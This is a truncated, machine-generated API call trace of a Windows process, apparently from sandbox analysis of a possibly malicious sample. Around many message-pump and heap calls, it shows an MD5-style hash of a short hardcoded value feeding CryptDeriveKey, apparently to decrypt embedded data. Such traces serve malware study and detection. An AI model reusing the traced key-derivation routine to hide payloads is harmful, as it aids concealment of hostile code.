wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.356] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.356] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.356] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.356] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.357] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.357] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.357] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.357] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.357] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.357] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.357] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.357] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.357] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.357] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.357] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.357] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.357] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.357] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.357] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.357] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.357] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.357] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.362] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.362] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.363] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.363] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.363] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.363] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.363] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.363] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.363] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa408, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0152.363] CryptCreateHash (in: hProv=0x9bf110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0152.363] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.363] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.363] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.365] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0152.366] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0152.366] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0152.366] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.367] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.367] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0152.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa318, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0152.367] CryptHashData (hHash=0x9e20b8, pbData=0x2a71d38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0152.367] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.367] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.367] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.367] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.367] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.367] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.367] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0152.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa408, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0152.368] CryptDeriveKey (in: hProv=0x9bf110, Algid=0x6601, hBaseData=0x9e20b8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e20f8) returned 1 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0152.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0152.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0152.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0152.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0152.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0152.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0152.370] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.370] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0152.370] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.370] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0152.370] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0152.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0152.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0152.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f7060 [0152.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0152.371] CryptDestroyHash (hHash=0x9e20b8) returned 1 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0152.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0152.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 